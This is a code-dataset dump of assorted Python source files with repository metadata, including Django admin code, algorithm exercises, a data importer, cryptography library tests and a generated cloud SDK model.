| column | dtype | values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3-281 |
| content_id | string | length 40 |
| detected_licenses | list | length 0-57 |
| license_type | string | 2 classes |
| repo_name | string | length 6-116 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 313 classes |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 18.2k-668M, nullable (⌀) |
| star_events_count | int64 | 0-102k |
| fork_events_count | int64 | 0-38.2k |
| gha_license_id | string | 17 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 107 classes |
| src_encoding | string | 20 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 4-6.02M |
| extension | string | 78 classes |
| content | string | length 2-6.02M |
| authors | list | length 1 |
| author | string | length 0-175 |

Each record below appears in the column order above: a pipe-separated metadata row, the `content` cell expanded inline, then the `authors` and `author` cells on the closing line.
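This schema matches a Hugging Face `datasets`-style code corpus. A minimal sketch of iterating such a dump with the `datasets` library follows; the dataset path `"<org>/<dataset>"` is a placeholder, since the dump does not name its source dataset:

```python
# Minimal sketch: stream records with the Hugging Face `datasets` library.
# The dataset path is a placeholder -- this dump does not name its source dataset.
from datasets import load_dataset

ds = load_dataset("<org>/<dataset>", split="train", streaming=True)
for row in ds:
    # Each row carries the columns listed in the schema above, e.g.:
    print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])
    print(row["content"][:200])  # first 200 characters of the source file
    break
```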
0b62db421f1b592394ee367b6221c3e0068a2a38 | 8477ff7ec00bc8307c51d7b5d0af7c35e0fa4758 | /elecciones/admin.py | 00a0af34cd8cdf926d224b134d34c7ff55482b93 | [] | no_license | ciudadanointeligente/votainteligente-primarias | afc512fb47075cbc31419361a51b9857d9c8a064 | 11b91990d99b41541b899bfc68d2cbc8fb64a4e1 | refs/heads/master | 2021-01-10T19:26:04.374281 | 2013-09-10T20:43:19 | 2013-09-10T20:43:19 | 10,316,015 | 0 | 0 | null | 2013-09-10T20:43:20 | 2013-05-27T14:06:21 | JavaScript | UTF-8 | Python | false | false | 1,770 | py |
# -*- coding: utf-8 -*-
from django.contrib import admin
from models import *


class ColectivoAdmin(admin.ModelAdmin):
    model = Colectivo

admin.site.register(Colectivo, ColectivoAdmin)


class IndiceInline(admin.TabularInline):
    model = Indice


class CandidatoInline(admin.TabularInline):
    model = Candidato
    extra = 0


class PreguntaInline(admin.TabularInline):
    model = Pregunta


class RespuestaInline(admin.TabularInline):
    model = Respuesta
    readonly_fields = ['candidato']
    extra = 0


class EleccionAdmin(admin.ModelAdmin):
    search_fields = ['nombre', 'candidato__nombre']
    inlines = [
        CandidatoInline,
        IndiceInline
    ]

admin.site.register(Eleccion, EleccionAdmin)


# admin action for bulk approval of questions
def aprobar_preguntas(modeladmin, request, queryset):
    for obj in queryset:
        obj.enviar()
        obj.procesada = True
        obj.aprobada = True
        obj.save()
aprobar_preguntas.short_description = "Aprobar Preguntas para enviar"


class PreguntaAdmin(admin.ModelAdmin):
    model = Pregunta
    list_display = ['texto_pregunta', 'aprobada', 'procesada']
    ordering = ['aprobada', 'procesada']
    # readonly_fields = ['procesada']
    actions = [aprobar_preguntas]
    inlines = [RespuestaInline]

    # special hook to approve and send the mail from the admin
    def save_model(self, request, obj, form, change):
        if obj.aprobada and not obj.procesada:
            obj.enviar()
            obj.procesada = True
        obj.save()

admin.site.register(Pregunta, PreguntaAdmin)


class AreaAdmin(admin.ModelAdmin):
    pass

admin.site.register(Area, AreaAdmin)


class DatoAdmin(admin.ModelAdmin):
    pass

admin.site.register(Dato, DatoAdmin)


class ContactoAdmin(admin.ModelAdmin):
    search_fields = ['valor', 'candidato__nombre']

admin.site.register(Contacto, ContactoAdmin)
["[email protected]"] | |
6f22947c146cdb3d4b4e9218a0d8cdabc51ca34a | a211aafcd8ae2369cd3289fca6ced287ee09cc26 | /algos_2/sprint_6_hashes/task_e.py | 881eb70ff3dc32e6e169dd04b5e31c413aba9309 | [] | no_license | vitt0ri0/yalgorithms | 562d27449bbc0907c37d632b6eff4d5dbf9da208 | 1ff6bdc92b61baf03463f299e62c6199d05be040 | refs/heads/master | 2023-03-21T21:07:02.339838 | 2021-03-21T13:00:43 | 2021-03-21T13:00:43 | 287,198,070 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 932 | py |
def task_e(arr):
    if len(arr) < 2:
        return 0
    prev1 = arr[0]
    prev2 = None
    counter = 0
    i = 1
    mmax = 0
    while i < len(arr):
        el = arr[i]
        el2 = arr[i - 1]
        if counter:
            a = (el, el2) == (prev2, prev1)
            b = (el, el2) == (prev1, prev2)
            if a or b:
                counter += 1
                prev2 = el
                prev1 = el2
                i += 1
            else:
                counter = 0
                prev1 = el
        elif el != prev1:
            counter = 1
            prev2 = prev1
            prev1 = el
            i += 1
        else:
            prev1 = el
        if counter > mmax:
            mmax = counter
        i += 1
    return mmax


if __name__ == '__main__':
    arr = [1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0]
    n = input()
    arr = list(map(int, input().split()))
    res = task_e(arr)
    print(res)
["[email protected]"] | |
222b65cae3e331d1bb9d612840a859b2b8569ee0 | 238eef9423ef2a909d4531bb70b02afda7b25a38 | /sutils/logger.py | 33e816e792fd1f10ed271bc0cadfd1b99d080cd0 | [] | no_license | sunqiang85/spytorch_v2 | 7f8f2209e5c6bc266484a6eebc5992d7accc3616 | 635c18cf2dd56bd92079fe761c70e73743a7890a | refs/heads/master | 2021-05-21T14:51:52.986344 | 2020-04-03T11:13:57 | 2020-04-03T11:13:57 | 252,686,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py |
from torch.utils.tensorboard import SummaryWriter
import logging


class Logger():
    def __init__(self, __C):
        self.__C = __C
        self.tensorboard = SummaryWriter(__C.tensorboard_path)
        self.filelogger = logging.getLogger(__name__)
        logging.basicConfig(level=logging.INFO)
        fh = logging.FileHandler(__C.log_path, mode='w')
        formatter = logging.Formatter("%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s")
        fh.setFormatter(formatter)  # the formatter was created but never attached; attach it to the file handler
        self.filelogger.addHandler(fh)
["[email protected]"] | |
3e119cfa6d182283fd4105948f57cc3949392715 | f6cadae90eb8fa3766acbb00a6c65fd2dfb3cb8d | /source/aiocomments/views/user_requests.py | 5a2aab955d11fec38b9d07f0c05db87df8cf20f5 | [] | no_license | RTyy/aiocomments | e6d3883777116a81653f12f498473883cebecbc4 | 2cb470462dbc1eaafbad1453f8f9050dc33d2412 | refs/heads/master | 2020-05-27T21:26:26.497154 | 2017-07-10T09:02:01 | 2017-07-10T09:02:01 | 94,754,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,798 | py |
"""User Requests Controller."""
import aiofiles
import trafaret as t
from aiohttp.web import StreamResponse, FileResponse
from datetime import datetime
from core.exceptions import CoreException
from core.db import acquire_connection
from ..consumers import DlResponseConsumer
from ..models import UserDlRequest, DlRequest, Comment, Instance, EventLog
@acquire_connection
async def get_user_dlrequests(request, db):
"""Return a list of previously created user request."""
# use trafaret as validator
trafaret = t.Dict({
t.Key('user_id'): t.Int,
})
try:
req = trafaret.check(request.match_info)
requests = DlRequest.list(db).raw.select(
DlRequest.id, DlRequest.itype_id, DlRequest.i_id,
DlRequest.author_id, DlRequest.start, DlRequest.end,
DlRequest.fmt, DlRequest.created) \
.filter(
UserDlRequest.user_id == req['user_id']) \
.order_by(UserDlRequest.created.desc())
return await requests
except t.DataError as e:
raise CoreException(400, 'Bad Request', e.as_dict())
@acquire_connection
async def download(request, db):
"""Prepare and return report according to request params."""
# use trafaret as validator
trafaret = t.Dict({
t.Key('user_id'): t.Int,
t.Key('start', optional=True, default=None): (t.Int | t.Null),
t.Key('end', optional=True, default=None): (t.Int | t.Null),
t.Key('author_id', optional=True, default=None): (t.Int | t.Null),
t.Key('i_id', optional=True, default=None): (t.Int | t.Null),
# 0 or unspecified means "comment"
t.Key('itype_id', optional=True, default=0): t.Int,
})
trafaret_format = t.Dict({
# t.Key('format', optional=True, default='xml'): t.Enum('xml'),
t.Key('format', optional=True,
default='xml'): lambda d: \
DlRequest.Format.by_verbose(d, DlRequest.Format.XML),
})
try:
req = trafaret.check(request.query)
if not req['i_id'] and not req['author_id']:
raise CoreException(400, 'Bad Request', {
'_': 'Instance or Author should be specidied.'})
req_fmt = trafaret_format.check(request.match_info).get('format')
root = None
# try to get previously stored request
try:
# make a filter
flt = DlRequest.fmt == req_fmt
if req['i_id']:
# make sure that requested instance exists.
if req['itype_id'] == 0:
root = await Comment.list(db).get(
Comment.id == req['i_id'])
else:
root = await Instance.list(db).get(
(Instance.i_id == req['i_id']) &
(Instance.itype_id == req['itype_id']))
flt &= (DlRequest.i_id == req['i_id']) \
& (DlRequest.itype_id == req['itype_id'])
if req['author_id']:
flt &= DlRequest.author_id == req['author_id']
if req['start'] is not None:
req['start'] = datetime.fromtimestamp(req['start'] / 1000)
flt &= (DlRequest.start == req['start'])
if req['end'] is not None:
req['end'] = datetime.fromtimestamp(req['end'] / 1000)
flt &= (DlRequest.end == req['end'])
dlreq = await DlRequest.list(db).get(flt)
# get user download request
try:
udlreq = await UserDlRequest.list(db).get(
(UserDlRequest.user_id == req['user_id']) &
(UserDlRequest.dlrequest_id == dlreq.id)
)
except UserDlRequest.DoesNotExist:
# crate a new one
udlreq = UserDlRequest(user_id=req['user_id'],
dlrequest_id=dlreq.id)
await udlreq.save(db)
except DlRequest.DoesNotExist:
# create both new download request and its link to the user
dlreq = DlRequest(**req)
dlreq.fmt = req_fmt
await dlreq.save(db, request.app['fs'])
udlreq = UserDlRequest(user_id=req['user_id'],
dlrequest_id=dlreq.id)
await udlreq.save(db)
except (Comment.DoesNotExist, Instance.DoesNotExist):
raise CoreException(404, 'Root Instance Not Found')
# proceed with request validation
# make sure there are no events that could affect
# previously generated report
if dlreq.state == DlRequest.State.VALID:
# build events query based on DlRequest params
events = EventLog.list(db).filter(EventLog.e_date > dlreq.created)
if root is not None:
events = events.filter(EventLog.tree_id == root.tree_id)
if dlreq.author_id:
events = events.filter(EventLog.author_id == dlreq.author_id)
if dlreq.start:
if dlreq.end:
events = events.filter(
EventLog.comment_cdate.between(dlreq.start, dlreq.end))
else:
events = events.filter(
EventLog.comment_cdate >= dlreq.start)
elif dlreq.end:
events = events.filter(EventLog.comment_cdate <= dlreq.end)
# check the number of events which affected
# previously generated report
if await events.count() > 0:
# mark report invalid if there at least one event found
dlreq.state = DlRequest.State.INVALID
await dlreq.save(db, request.app['fs'])
# prepare requested report
report_filename = 'report'
report_filepath = request.app['fs'].path(dlreq.filename)
# if req['author_id']:
# report_filename += '-user%s' % req['author_id']
# if req['i_id']:
# report_filename += '-comment%s' % i_id if req['type_id'] == 0 \
# else '-instance%s(%s)' % (req['i_id'], req['itype_id'])
headers = {
'Content-Type': 'text/xml',
'Content-Disposition':
'attachment; filename="%s.xml"' % report_filename,
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'
}
# is_valid flag telling us if requested report was generated
# and if it's still valid (there were no updates or new comments
# created within a period specified by the request)
if dlreq.state == DlRequest.State.VALID:
# return a pure FileResponse
return FileResponse(report_filepath, headers=headers)
else:
stream = StreamResponse(status=200, reason='OK', headers=headers)
# stream.enable_chunked_encoding()
await stream.prepare(request)
# here we will await for the message from the report builder
# over local pubsub service
await DlResponseConsumer(dlreq.id, loop=request.app.loop).run()
# stream generated report file
async with aiofiles.open(request.app['fs'].path(dlreq.filename),
'r') as fd:
while True:
chunk = await fd.read(1024)
if not chunk:
break
stream.write(chunk.encode('utf-8'))
# yield to the scheduler so other processes do stuff.
await stream.drain()
await stream.write_eof()
return stream
except t.DataError as e:
raise CoreException(400, 'Bad Request', e.as_dict())
["[email protected]"] | |
416b6e3bfd65de33b7549956af8ebdb24642ebc6 | 6cfcf1b6ef7afe49eebe4edbd21184fc914c7755 | /Exercicios/ex024.py | a340c88d759c0fc679b1a895d2a9b21fbe5500a7 | [] | no_license | mmagalha/Python | 254df310a2a4f79258638321094296860bf4097a | 95cbcc57c6f26d37954bc8835da885d32b4e607e | refs/heads/master | 2021-05-02T07:42:56.872807 | 2018-02-12T01:05:02 | 2018-02-12T01:05:02 | 118,944,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py |
# Python Exercise 024: read the name of a city and report whether or not it starts with the word "SANTO".
cidade = str(input("Digite o nome da sua cidade: ")).upper()
print(cidade[:5] == "SANTO")
["[email protected]"] | |
1b0b318977f920b37ea3424f58bc5c6b179df0c8 | 1eaf99e876b5fc5b05de1b41014dca6efc6601f1 | /cupcake.py | 23923a460a24f77dd8a4d3e9eda0372799595992 | [] | no_license | puspita-sahoo/codechef_program | 5466dfc675e11b276a76d30fd8a3787fa106590a | 1fae1e9b89ebedb963216e5e79a673716e8b5cc9 | refs/heads/master | 2023-08-21T15:01:42.804814 | 2021-09-10T17:47:26 | 2021-09-10T17:47:26 | 405,164,524 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py |
T = int(input())
for i in range(T):
    N = int(input())
    ap = (N // 2) + 1
    print(ap)
["[email protected]"] | |
df0300b9ae066ae31618798f45525e2480426413 | 7a1b08c64b29522d4bbb913475275c1bc8ad61a4 | /patient_agenda/events/doc_events/conver_value.py | afcdc7008de591882958f1eb59c25de32cecb141 | ["MIT"] | permissive | erichilarysmithsr/time-track | 8f84d4cc92cebaedce550b3741982d204e734a6c | dc0a7b63c937d561309f9b1c84af65fb581a8e18 | refs/heads/master | 2023-03-27T08:07:46.717221 | 2021-03-30T16:45:50 | 2021-03-30T16:45:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py |
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import os
import json
import subprocess

try:
    with open('./patient_agenda/events/doc_events/patient_rdv.json') as file:
        data = json.load(file)
except FileNotFoundError as fileout:
    print("File 1 patient_rdv.json not created", fileout)

for value in data:
    print(value)

data_list1 = []
for value in data:
    data_list1.append(value[1])

data_day = data_list1[0]
data_month = data_list1[1]
data_year = data_list1[2]

try:
    if data_day < 10:
        extraday = '0' + '' + str(data_day)
    elif data_day >= 10:
        extraday = str(data_day)
    else:
        pass
except ValueError as valout:
    print("Value of day is a problem", valout)

try:
    if data_month < 10:
        extramounth = '0' + '' + str(data_month)
    elif data_month >= 10:
        extramounth = str(data_month)
    else:
        pass
except ValueError as valout:
    print("Value of month is a problem", valout)

# initword = "Appointment set for :"
# initword + ' ' +
final_data = extraday + '/' + extramounth + '/' + str(data_year) + ' :'
print(final_data)

try:
    if os.path.getsize('./patient_agenda/events/doc_events/fix_agenda/patient_value.json'):
        print("+ File 'value' exist !")
        with open('./patient_agenda/events/doc_events/fix_agenda/patient_value.json', 'w') as partytime:
            json.dump(final_data, partytime)
except FileNotFoundError as msg:
    print("File doesn't exist, but it has been created !")
    with open('./patient_agenda/events/doc_events/fix_agenda/patient_value.json', 'w') as partyleft:
        json.dump(final_data, partyleft)

subprocess.call('./patient_agenda/events/doc_events/fix_agenda/extend_agenda.py')
["[email protected]"] | |
d1e21770e28bf318bb9670ca416bde39191d4f7d | 6e0108c11132e63c81adbfab4309011b1f9f6dda | /tests/python/extra/clear_leaves.py | 4d2f1e3a58a3fcb2fd07655efd2646b28d0a5f5f | ["Apache-2.0"] | permissive | scottdonaldau/ledger-qrl | c28a614ae52c44e53947e444abf078ec27041815 | 7a3b933b84065b9db2b775d50205efcdbed2399e | refs/heads/master | 2020-04-12T07:12:25.687015 | 2018-12-19T02:55:43 | 2018-12-19T02:55:43 | 162,360,262 | 0 | 0 | Apache-2.0 | 2018-12-19T00:15:27 | 2018-12-19T00:15:27 | null | UTF-8 | Python | false | false | 269 | py |
from pyledgerqrl.ledgerqrl import *

dev = LedgerQRL()

start = time.time()
for i in range(256):
    data = bytearray([i]) + bytearray.fromhex("00" * 32)
    answer = dev.send(INS_TEST_WRITE_LEAF, data)
    assert len(answer) == 0

answer = dev.send(INS_TEST_PK_GEN_1)
["[email protected]"] | |
020e659363902ab2305fccbb021c6b361e707718 | 8db243a61d43e133aac01a67294d26df3381a8f5 | /Recursion/BinarySearch_Recursion.py | 2cca8e334ec83ad6effa671540e35b2e6d6a31c0 | [] | no_license | Jyoti1706/Algortihms-and-Data-Structures | ccdd93ad0811585f9b3e1e9f639476ccdf15a359 | 3458a80e02b9957c9aeaf00bf691cc7aebfd3bff | refs/heads/master | 2023-06-21T18:07:13.419498 | 2023-06-16T17:42:55 | 2023-06-16T17:42:55 | 149,984,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py |
def Binary_Search_Recursion(arr, lo, hi, target):
    if lo > hi:
        return -1
    mid = (lo + hi) // 2
    if arr[mid] == target:
        return mid
    elif arr[mid] > target:
        hi = mid - 1
        return Binary_Search_Recursion(arr, lo, hi, target)
    else:
        lo = mid + 1  # was "lo = lo + 1", which degrades the search to a linear scan
        return Binary_Search_Recursion(arr, lo, hi, target)


arr = [-1, 0, 1, 2, 3, 4, 7, 9, 10, 20]
target = 10
# hi is inclusive here, so the initial call uses len(arr) - 1
print(f"index of target is :: {Binary_Search_Recursion(arr, 0, len(arr) - 1, target)}")
["[email protected]"] | |
e4f2ffff2bf16986aa3131d71811dfb973f65ef7 | 9d126bd1569104d953f59005cae73197678c1566 | /n-apekatter.py | 35d7c584585e02c3aa2ee4b038a0ad99058296a4 | [] | no_license | supermons/n-apekatter | 75e84a9b5b9b3833e06b8a8bbdd00cb8716a4737 | db78878e3e8913117e9b3a04e36ad67b686e9844 | refs/heads/master | 2020-04-01T07:54:38.056944 | 2018-10-14T19:35:57 | 2018-10-14T19:35:57 | 153,009,295 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py |
n = 5
while n != 0:
    if n == 1:
        print("En liten apekatt sitter i ett tre")
        print("Den erter krokodillen: 'Du kan ikke ta meg ned'")
    else:
        print(str(n) + " små apekatter sitter i ett tre")
        print("De erter krokodillen: 'Du kan ikke ta oss ned'")
    print("Sa kom krokodillen, så diger og så svær og slurp!")
    n = n - 1
    if n == 0:
        print("Da var det ingen apekatter der")
    else:
        print("Så var de bare " + str(n) + " apekatter der")
    print("\n")
["[email protected]"] | |
55559c3ca1ad5ff7d80c5cf736dab7da2c5d72a7 | dfff816642f4e1afeab268f441906a6d811d3fb4 | /polling_stations/apps/data_collection/management/commands/import_newham.py | d1463f346e39dd465ff77e53dbf91e637072ccae | [] | permissive | mtravis/UK-Polling-Stations | 2c07e03d03959492c7312e5a4bfbb71e12320432 | 26e0331dc29253dc436a0462ffaa01e974c5dc52 | refs/heads/master | 2020-05-14T18:36:31.501346 | 2019-04-17T12:54:57 | 2019-04-17T12:54:57 | 181,912,382 | 0 | 0 | BSD-3-Clause | 2019-04-17T14:48:26 | 2019-04-17T14:48:26 | null | UTF-8 | Python | false | false | 1,255 | py |
from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter


class Command(BaseXpressDemocracyClubCsvImporter):
    council_id = "E09000025"
    addresses_name = "local.2018-05-03/Version 2/LBNewham Democracy_Club__03May2018.TSV"
    stations_name = "local.2018-05-03/Version 2/LBNewham Democracy_Club__03May2018.TSV"
    elections = ["local.2018-05-03", "mayor.newham.2018-05-03"]
    csv_delimiter = "\t"

    def address_record_to_dict(self, record):
        if record.addressline6 == "E16 1EF":
            return None
        if record.property_urn == "10090852604":
            return None
        if record.property_urn == "10034510101":
            rec = super().address_record_to_dict(record)
            rec["postcode"] = "E13 8NA"
            return rec
        if record.addressline6 == "E16 1XF":
            return None
        if record.property_urn == "10090756946":
            rec = super().address_record_to_dict(record)
            rec["postcode"] = "E7 9AW"
            return rec
        if record.property_urn == "10023994990":
            rec = super().address_record_to_dict(record)
            rec["postcode"] = "E7 9AW"
            return rec
        return super().address_record_to_dict(record)
["[email protected]"] | |
0048953dec39f492a91c8bdde7a9ddaca57537a1 | 5d4753b7e463827c9540e982108de22f62435c3f | /python/tink/daead/_deterministic_aead_wrapper_test.py | b59d11dca3c7331a23581b856195197dfeb49b72 | ["Apache-2.0"] | permissive | thaidn/tink | 8c9b65e3f3914eb54d70847c9f56853afd051dd3 | 2a75c1c3e4ef6aa1b6e29700bf5946b725276c95 | refs/heads/master | 2021-07-25T02:02:59.839232 | 2021-02-10T17:21:31 | 2021-02-10T17:22:01 | 337,815,957 | 2 | 0 | Apache-2.0 | 2021-02-10T18:28:20 | 2021-02-10T18:28:20 | null | UTF-8 | Python | false | false | 6,074 | py |
# Copyright 2019 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tink.python.tink.aead_wrapper."""

from __future__ import absolute_import
from __future__ import division
# Placeholder for import for type annotations
from __future__ import print_function

from absl.testing import absltest
from absl.testing import parameterized

import tink
from tink import daead

from tink.testing import keyset_builder


DAEAD_TEMPLATE = daead.deterministic_aead_key_templates.AES256_SIV
RAW_DAEAD_TEMPLATE = keyset_builder.raw_template(DAEAD_TEMPLATE)


def setUpModule():
  daead.register()


class AeadWrapperTest(parameterized.TestCase):

  @parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE])
  def test_encrypt_decrypt(self, template):
    keyset_handle = tink.new_keyset_handle(template)
    primitive = keyset_handle.primitive(daead.DeterministicAead)
    ciphertext = primitive.encrypt_deterministically(
        b'plaintext', b'associated_data')
    self.assertEqual(
        primitive.decrypt_deterministically(ciphertext, b'associated_data'),
        b'plaintext')

  @parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE])
  def test_decrypt_unknown_ciphertext_fails(self, template):
    unknown_handle = tink.new_keyset_handle(template)
    unknown_primitive = unknown_handle.primitive(daead.DeterministicAead)
    unknown_ciphertext = unknown_primitive.encrypt_deterministically(
        b'plaintext', b'associated_data')
    keyset_handle = tink.new_keyset_handle(template)
    primitive = keyset_handle.primitive(daead.DeterministicAead)
    with self.assertRaises(tink.TinkError):
      primitive.decrypt_deterministically(unknown_ciphertext,
                                          b'associated_data')

  @parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE])
  def test_decrypt_wrong_associated_data_fails(self, template):
    keyset_handle = tink.new_keyset_handle(template)
    primitive = keyset_handle.primitive(daead.DeterministicAead)
    ciphertext = primitive.encrypt_deterministically(b'plaintext',
                                                     b'associated_data')
    with self.assertRaises(tink.TinkError):
      primitive.decrypt_deterministically(ciphertext, b'wrong_associated_data')

  @parameterized.parameters([(DAEAD_TEMPLATE, DAEAD_TEMPLATE),
                             (RAW_DAEAD_TEMPLATE, DAEAD_TEMPLATE),
                             (DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE),
                             (RAW_DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE)])
  def test_encrypt_decrypt_with_key_rotation(self, template1, template2):
    builder = keyset_builder.new_keyset_builder()
    older_key_id = builder.add_new_key(template1)
    builder.set_primary_key(older_key_id)
    p1 = builder.keyset_handle().primitive(daead.DeterministicAead)

    newer_key_id = builder.add_new_key(template2)
    p2 = builder.keyset_handle().primitive(daead.DeterministicAead)

    builder.set_primary_key(newer_key_id)
    p3 = builder.keyset_handle().primitive(daead.DeterministicAead)

    builder.disable_key(older_key_id)
    p4 = builder.keyset_handle().primitive(daead.DeterministicAead)

    self.assertNotEqual(older_key_id, newer_key_id)
    # p1 encrypts with the older key. So p1, p2 and p3 can decrypt it,
    # but not p4.
    ciphertext1 = p1.encrypt_deterministically(b'plaintext', b'ad')
    self.assertEqual(p1.decrypt_deterministically(ciphertext1, b'ad'),
                     b'plaintext')
    self.assertEqual(p2.decrypt_deterministically(ciphertext1, b'ad'),
                     b'plaintext')
    self.assertEqual(p3.decrypt_deterministically(ciphertext1, b'ad'),
                     b'plaintext')
    with self.assertRaises(tink.TinkError):
      _ = p4.decrypt_deterministically(ciphertext1, b'ad')

    # p2 encrypts with the older key. So p1, p2 and p3 can decrypt it,
    # but not p4.
    ciphertext2 = p2.encrypt_deterministically(b'plaintext', b'ad')
    self.assertEqual(p1.decrypt_deterministically(ciphertext2, b'ad'),
                     b'plaintext')
    self.assertEqual(p2.decrypt_deterministically(ciphertext2, b'ad'),
                     b'plaintext')
    self.assertEqual(p3.decrypt_deterministically(ciphertext2, b'ad'),
                     b'plaintext')
    with self.assertRaises(tink.TinkError):
      _ = p4.decrypt_deterministically(ciphertext2, b'ad')

    # p3 encrypts with the newer key. So p2, p3 and p4 can decrypt it,
    # but not p1.
    ciphertext3 = p3.encrypt_deterministically(b'plaintext', b'ad')
    with self.assertRaises(tink.TinkError):
      _ = p1.decrypt_deterministically(ciphertext3, b'ad')
    self.assertEqual(p2.decrypt_deterministically(ciphertext3, b'ad'),
                     b'plaintext')
    self.assertEqual(p3.decrypt_deterministically(ciphertext3, b'ad'),
                     b'plaintext')
    self.assertEqual(p4.decrypt_deterministically(ciphertext3, b'ad'),
                     b'plaintext')

    # p4 encrypts with the newer key. So p2, p3 and p4 can decrypt it,
    # but not p1.
    ciphertext4 = p4.encrypt_deterministically(b'plaintext', b'ad')
    with self.assertRaises(tink.TinkError):
      _ = p1.decrypt_deterministically(ciphertext4, b'ad')
    self.assertEqual(p2.decrypt_deterministically(ciphertext4, b'ad'),
                     b'plaintext')
    self.assertEqual(p3.decrypt_deterministically(ciphertext4, b'ad'),
                     b'plaintext')
    self.assertEqual(p4.decrypt_deterministically(ciphertext4, b'ad'),
                     b'plaintext')


if __name__ == '__main__':
  absltest.main()
["[email protected]"] | |
f487b32d187d8c46617f40bfa556df73ae0f4374 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-iotanalytics/huaweicloudsdkiotanalytics/v1/model/list_batch_jobs_response.py | c820f1d45d59dffa07e947b9b3b4e80b79e3084e | ["Apache-2.0"] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,929 | py |
# coding: utf-8

import six

from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization


class ListBatchJobsResponse(SdkResponse):
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """

    sensitive_list = []

    openapi_types = {
        'count': 'int',
        'jobs': 'list[Job]'
    }

    attribute_map = {
        'count': 'count',
        'jobs': 'jobs'
    }

    def __init__(self, count=None, jobs=None):
        """ListBatchJobsResponse

        The model defined in huaweicloud sdk

        :param count: Total number of scheduled jobs.
        :type count: int
        :param jobs:
        :type jobs: list[:class:`huaweicloudsdkiotanalytics.v1.Job`]
        """
        super(ListBatchJobsResponse, self).__init__()

        self._count = None
        self._jobs = None
        self.discriminator = None

        if count is not None:
            self.count = count
        if jobs is not None:
            self.jobs = jobs

    @property
    def count(self):
        """Gets the count of this ListBatchJobsResponse.

        Total number of scheduled jobs.

        :return: The count of this ListBatchJobsResponse.
        :rtype: int
        """
        return self._count

    @count.setter
    def count(self, count):
        """Sets the count of this ListBatchJobsResponse.

        Total number of scheduled jobs.

        :param count: The count of this ListBatchJobsResponse.
        :type count: int
        """
        self._count = count

    @property
    def jobs(self):
        """Gets the jobs of this ListBatchJobsResponse.

        :return: The jobs of this ListBatchJobsResponse.
        :rtype: list[:class:`huaweicloudsdkiotanalytics.v1.Job`]
        """
        return self._jobs

    @jobs.setter
    def jobs(self, jobs):
        """Sets the jobs of this ListBatchJobsResponse.

        :param jobs: The jobs of this ListBatchJobsResponse.
        :type jobs: list[:class:`huaweicloudsdkiotanalytics.v1.Job`]
        """
        self._jobs = jobs

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ListBatchJobsResponse):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
["[email protected]"] | |
